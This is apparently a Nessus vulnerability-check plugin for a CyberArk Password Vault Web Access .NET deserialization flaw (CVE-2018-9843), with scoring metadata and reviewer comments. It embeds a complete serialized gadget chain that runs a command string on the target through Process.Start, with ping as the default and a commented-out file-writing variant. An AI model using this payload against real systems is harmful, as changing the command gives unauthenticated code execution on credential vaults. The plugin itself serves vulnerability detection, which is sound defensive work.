CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
98.1%
The CyberArk Password Vault Web Access running on the remote host is affected by a remote code execution vulnerability due to unsafe deserialization of a .NET object. An unauthenticated, remote attacker can exploit this, via a crafted .NET object, to execute arbitrary .NET code in the context of the IIS server.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration block: executed only when the scanner loads the plugin's
# metadata (the `description` flag is set). It ends with exit(0), so none of
# the network code further down runs in this mode.
if (description)
{
script_id(110287);
script_version("1.5");
script_cvs_date("Date: 2019/10/07 15:15:27");
script_cve_id("CVE-2018-9843");
script_bugtraq_id(105180);
script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)");
script_summary(english:"Sends a .NET object to trigger an error message.");
script_set_attribute(attribute:"synopsis", value:
"An Identity Management application running on the remote host is affected by
a remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The CyberArk Password Vault Web Access running on the remote host is
affected by a remote code execution vulnerability due to unsafe
deserialization of an .NET object. An unauthenticated, remote
attacker can exploit this, via a crafted a .NET object, to execute
arbitrary .NET code in the context of the IIS server.");
# Vendor-independent advisory; presumably the target of the shortened
# see_also link below - confirm.
# https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
script_set_attribute(attribute:"solution", value:
"Upgrade to CyberArk Password Vault Web Access 9.9.5, 9.10.1, 10.2 or Later.");
# CVSS v2 and v3 base/temporal vectors; the score source is the CVE entry.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
# The recorded patch date (2018/02/28) is earlier than the recorded
# vulnerability publication date (2018/04/09).
script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/01");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
script_end_attributes();
# NOTE(review): registered as ACT_GATHER_INFO, yet the check further down
# sends a serialized object that embeds a `ping -n 3 localhost` command; on an
# affected host that command presumably runs while the object is
# deserialized. Confirm this is acceptable under the scan policy before
# running against production vaults.
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Requires the installed_sw KB key for the application; presumably written by
# the detection plugin named in script_dependencies - confirm.
script_dependencies("cyberark_password_vault_detection.nbin");
script_require_keys("installed_sw/CyberArk Password Vault Web Access");
script_require_ports("Services/www", 80, 443);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");
# Target selection and probe parameters. The names assigned here (app, port,
# install, url, cmd) are all consumed by the statements that follow.
app = 'CyberArk Password Vault Web Access';
# Plugin will exit if app is not detected on host
get_install_count(app_name:app, exit_if_zero:TRUE);
# Plugin will exit if app is not detected on this port
port = get_http_port(default:80);
# exit_if_unknown_ver:FALSE lets the check continue when detection recorded no
# version. NOTE(review): install['version'] is later passed to audit() and may
# be unset in that case - confirm the resulting message is still useful.
install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:FALSE);
# Web-service path the probe request is sent to.
url = "/PasswordVault/WebServices/PIMServices.svc/Applications/?Location=\&IncludeSublocations=true";
# Command string spliced into the serialized object. The default only pings
# localhost three times; the verdict is taken from the server's error message,
# not from any output of this command.
cmd = 'ping -n 3 localhost';
# vuln verification
# NOTE(review): leftover manual-verification alternative that writes a file on
# the target. Keep it disabled: the check does not need it, and a scanner
# should not leave artifacts on a password vault host.
#cmd = 'dir > c:\\Windows\\Temp\\hacked.txt';
# Prepend the /c switch; the object stream carries the literal "cmd" as a
# separate string field.
cmd = '/c ' + cmd;
# Serialized .NET object sent to the server in place of a session token.
# Readable ASCII inside the bytes names System.Collections.Generic.SortedSet`1,
# ComparisonComparer`1, System.DelegateSerializationHolder and
# System.Diagnostics.Process / Start. The command string from `cmd` is spliced
# in between the two raw_string() halves, preceded by mkword(strlen(cmd)).
# NOTE(review): the length prefix is derived from `cmd`, so the stream is only
# known to be well-formed as generated here; treat the literal as opaque test
# data and do not hand-edit it.
obj = raw_string(
0x00,0x01,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x0C,0x02,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
0x05,0x01,0x00,0x00,0x00,0x84,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,
0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,
0x63,0x2E,0x53,0x6F,0x72,0x74,0x65,0x64,0x53,0x65,0x74,0x60,0x31,0x5B,0x5B,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x04,0x00,0x00,0x00,0x05,
0x43,0x6F,0x75,0x6E,0x74,0x08,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x07,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x05,0x49,0x74,0x65,0x6D,0x73,0x00,0x03,0x00,0x06,
0x08,0x8D,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,
0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,
0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,
0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,
0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,
0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,
0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,
0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,
0x08,0x02,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x09,0x03,0x00,0x00,0x00,0x02,0x00,
0x00,0x00,0x09,0x04,0x00,0x00,0x00,0x04,0x03,0x00,0x00,0x00,0x8D,0x01,0x53,0x79,
0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,
0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x69,
0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x60,0x31,0x5B,0x5B,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x01,0x00,0x00,0x00,0x0B,
0x5F,0x63,0x6F,0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x03,0x22,0x53,0x79,0x73,
0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,
0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,
0x05,0x00,0x00,0x00,0x11,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x06,0x06,0x00,
0x00) +
mkword(strlen(cmd)) + cmd +
raw_string(
0x06,0x07,0x00,0x00,0x00,0x03,0x63,0x6D,
0x64,0x04,0x05,0x00,0x00,0x00,0x22,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,
0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x03,0x00,0x00,0x00,0x08,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x07,0x6D,0x65,0x74,0x68,0x6F,0x64,0x30,0x07,0x6D,
0x65,0x74,0x68,0x6F,0x64,0x31,0x03,0x03,0x03,0x30,0x53,0x79,0x73,0x74,0x65,0x6D,
0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,
0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,0x6C,
0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x2F,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2F,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,0x08,0x00,0x00,0x00,0x09,
0x09,0x00,0x00,0x00,0x09,0x0A,0x00,0x00,0x00,0x04,0x08,0x00,0x00,0x00,0x30,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,
0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,
0x72,0x2B,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x07,
0x00,0x00,0x00,0x04,0x74,0x79,0x70,0x65,0x08,0x61,0x73,0x73,0x65,0x6D,0x62,0x6C,
0x79,0x06,0x74,0x61,0x72,0x67,0x65,0x74,0x12,0x74,0x61,0x72,0x67,0x65,0x74,0x54,
0x79,0x70,0x65,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x0E,0x74,0x61,0x72,0x67,
0x65,0x74,0x54,0x79,0x70,0x65,0x4E,0x61,0x6D,0x65,0x0A,0x6D,0x65,0x74,0x68,0x6F,
0x64,0x4E,0x61,0x6D,0x65,0x0D,0x64,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,
0x74,0x72,0x79,0x01,0x01,0x02,0x01,0x01,0x01,0x03,0x30,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,
0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x06,0x0B,0x00,0x00,0x00,
0xB0,0x02,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x46,0x75,0x6E,0x63,0x60,0x33,0x5B,
0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,
0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,
0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,
0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,
0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,
0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,
0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,
0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,
0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,
0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,
0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,
0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,
0x6F,0x63,0x65,0x73,0x73,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
0x5D,0x5D,0x06,0x0C,0x00,0x00,0x00,0x4B,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,
0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
0x30,0x38,0x39,0x0A,0x06,0x0D,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,
0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
0x30,0x38,0x39,0x06,0x0E,0x00,0x00,0x00,0x1A,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,
0x65,0x73,0x73,0x06,0x0F,0x00,0x00,0x00,0x05,0x53,0x74,0x61,0x72,0x74,0x09,0x10,
0x00,0x00,0x00,0x04,0x09,0x00,0x00,0x00,0x2F,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,0x62,0x65,
0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,
0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x07,0x00,0x00,0x00,0x04,0x4E,0x61,0x6D,
0x65,0x0C,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x4E,0x61,0x6D,0x65,0x09,0x43,
0x6C,0x61,0x73,0x73,0x4E,0x61,0x6D,0x65,0x09,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,
0x72,0x65,0x0A,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x32,0x0A,0x4D,0x65,
0x6D,0x62,0x65,0x72,0x54,0x79,0x70,0x65,0x10,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,
0x41,0x72,0x67,0x75,0x6D,0x65,0x6E,0x74,0x73,0x01,0x01,0x01,0x01,0x01,0x00,0x03,
0x08,0x0D,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x54,0x79,0x70,0x65,0x5B,0x5D,0x09,
0x0F,0x00,0x00,0x00,0x09,0x0D,0x00,0x00,0x00,0x09,0x0E,0x00,0x00,0x00,0x06,0x14,
0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,
0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x53,
0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x29,0x06,0x15,0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,
0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,
0x73,0x73,0x20,0x53,0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,
0x74,0x72,0x69,0x6E,0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x0A,0x00,0x00,0x00,
0x09,0x00,0x00,0x00,0x06,0x16,0x00,0x00,0x00,0x07,0x43,0x6F,0x6D,0x70,0x61,0x72,
0x65,0x09,0x0C,0x00,0x00,0x00,0x06,0x18,0x00,0x00,0x00,0x0D,0x53,0x79,0x73,0x74,
0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x06,0x19,0x00,0x00,0x00,0x2B,0x49,
0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,
0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,
0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x29,0x06,0x1A,0x00,0x00,0x00,0x32,
0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x49,0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,
0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x10,0x00,0x00,0x00,0x08,0x00,0x00,0x00,
0x06,0x1B,0x00,0x00,0x00,0x71,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6D,
0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,
0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,
0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,
0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,
0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,
0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x09,0x0C,0x00,0x00,0x00,0x0A,0x09,0x0C,0x00,
0x00,0x00,0x09,0x18,0x00,0x00,0x00,0x09,0x16,0x00,0x00,0x00,0x0A,0x0B
);
# PVWA can answer slowly, so allow a longer read timeout for this request.
http_set_read_timeout(30);

# The serialized object is delivered base64-encoded in the Authorization header.
auth_value = base64(str: obj);

res = http_send_recv3(
  method      : 'GET',
  port        : port,
  item        : url,
  content_type: 'application/json',
  add_headers : make_array('authorization', auth_value),
  fetch404    : TRUE,
  exit_on_fail: TRUE
);

# Without a response body there is nothing to evaluate.
if (isnull(res[2]))
{
  audit(AUDIT_RESP_NOT, port, 'a GET request: No data in the response body');
}

# Expected answers (both HTTP 403):
#   patched  - {"ErrorCode":"CAWS00001E","ErrorMessage":"Connection to the Vault was terminated."}
#   affected - {"ErrorCode":"CAWS00001E","ErrorMessage":"Error raised while trying to establish
#              session using session token provided. Error: Unable to cast object of type
#              'System.Collections.Generic.SortedSet`1[System.String]' to type
#              'CyberArk.Services.Web.SessionIdentifiers'."}
# The cast error shows that the server deserialized the supplied object before
# checking its type.
# NOTE(review): every body that lacks the cast error is audited as "not
# vulnerable", which would also cover a proxy/WAF error page or a server that
# hides detailed errors. Confirm the installed version against the fixed
# releases named in the solution text before trusting a negative result.
if (res[2] !~ "Unable to cast object of type.* to type 'CyberArk.Services.Web.SessionIdentifiers")
{
  audit(AUDIT_INST_VER_NOT_VULN, app, install['version']);
}

# Reaching this point means the cast error was present: report the finding.
report =
  '\nNessus was able to detect the .NET deserialization vulnerability by' +
  '\nsending a crafted .NET object.' +
  '\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);